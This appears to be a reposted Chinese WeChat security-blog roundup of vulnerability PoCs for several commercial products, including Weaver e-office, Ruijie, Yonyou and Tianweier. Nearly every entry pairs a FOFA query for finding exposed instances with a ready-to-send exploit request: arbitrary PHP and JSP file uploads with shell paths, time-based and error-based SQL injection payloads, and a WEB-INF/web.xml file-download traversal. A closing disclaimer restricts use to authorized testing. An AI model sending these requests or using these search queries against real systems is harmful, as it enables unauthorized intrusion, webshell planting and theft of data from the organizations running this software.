泛微e-office系统UserSelect接口存在未授权访问漏洞
fofa
app="泛微-EOffice"
poc
http://127.0.0.1/UserSelect/
泛微E-Office-uploadfile.php任意文件上传漏洞
fofa
(body="login.php"&&body="eoffice")||body="/general/login/index.php"
icon_hash="1578525679"
poc
POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348
Content-Length: 193
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="test.php"
Content-Type: image/jpeg
<?php phpinfo();?>
--e64bdf16c554bbc109cecef6451c26a4--
文件上传路径
/images/logo/logo-eoffice.php
锐捷校园网自助服务系统operatorReportorRoamService存在SQL注入漏洞
fofa
title=="校园网自助服务系统"
poc
POST /selfservice/service/operatorReportorRoamService HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Connection: close
Content-Type: text/xml;charset=UTF-8
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.webservice.common.spl.ruijie.com">
<soapenv:Header/>
<soapenv:Body>
<ser:queryOperatorUuid>
<!--type: string-->
<ser:in0>';WAITFOR DELAY '0:0:5'--</ser:in0>
</ser:queryOperatorUuid>
</soapenv:Body>
</soapenv:Envelope>
网动统一通信平台ActiveUC存在任意文件下载漏洞
fofa
title="网动统一通信平台(Active UC)"
poc
http://ip/acenter/meetingShow!downloadDocument.action?filePath=WEB-INF/web.xml&filename=xxx
用友移动系统管理uploadApk接口存在任意文件上传
fofa
body="../js/jslib/jquery.blockUI.js"
poc
POST /maportal/appmanager/uploadApk.dopk_obj= HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 196
--fa48ebfef59b133a8cd5275661b35d2c
Content-Disposition: form-data; name="downloadpath"; filename="59209.jsp"
Content-Type: application/msword
082863327
--fa48ebfef59b133a8cd5275661b35d2c--
上传的shell地址拼接:
http://127.0.0.1/maupload/apk/59209.jsp
天维尔消防智能指挥平台API接口页面sql注入
漏洞描述
天维尔消防智能指挥平台API接口页面sql注入,黑客可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
漏洞复现
Fofa
body="1997-2020 天维尔信息科技股份有限公司"
隐患url,复现如下
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 103
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930')AND 5803=(SELECT 5803 FROM PG_SLEEP(3)) AND ('oJoi'='oJoi"},"hgubmt748n4":"="}
0day卡号极团管理系统某接口存在SQL注入漏洞
号卡极团系统依托多方平台+互联网,一键即可便捷快速的为您自己打造一个独立的属于你的号卡分销商城。此系统某接口存在SQL注入漏洞。
0x03漏洞描述
SQL注入漏洞是一种安全漏洞,它允许攻击者将恶意SQL代码插入到应用程序的输入字段中,这些输入然后被后端数据库执行。这种漏洞存在于处理输入数据时未能适当地过滤或限制SQL语句的应用程序中。攻击者利用这种漏洞可以绕过应用程序的安全机制,执行未授权的数据库命令,从而访问、窃取、修改或删除数据库中存储的敏感数据。
fofa
Fofa语法:icon_hash="-795291075"GET /order/index.php?pid=1%27%20AND%20(extractvalue(1,concat(0x7e,(select%20md5(1)),0x7e)));--%20htjf HTTP/1.1Connection: close
公众号技术文章仅供诸位网络安全工程师对自己所管辖的网站、服务器、网络进行检测或维护时参考用,公众号的检测工具仅供各大安全公司的安全测试员安全测试使用。未经允许请勿利用文章里的技术资料对任何外部计算机系统进行入侵攻击,公众号的各类工具均不得用于任何非授权形式的安全测试。公众号仅提供技术交流,不对任何成员利用技术文章或者检测工具造成任何理论上的或实际上的损失承担责任。
原文始发于微信公众号(TKing的安全圈):0424更新漏洞POC/EXP
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论